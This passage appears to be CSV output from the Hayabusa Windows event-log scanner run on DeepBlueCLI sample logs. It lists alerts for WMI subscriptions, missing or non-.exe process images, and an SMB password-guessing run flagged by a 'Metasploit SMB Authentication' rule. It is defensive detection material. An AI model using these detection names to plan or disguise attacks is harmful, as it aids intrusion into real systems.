Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:53:55.378 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:10:46.008 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.660 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:45:42.333 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:46:17.504 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:46:53.627 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:47:29.168 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:48:26.011 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:48:49.187 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:49:58.603 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:06.219 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:13.833 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:25.086 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:51:39.538 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:52:37.050 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:53:24.700 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:53:57.790 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 01:34:31.100 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.588 
+09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 
+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
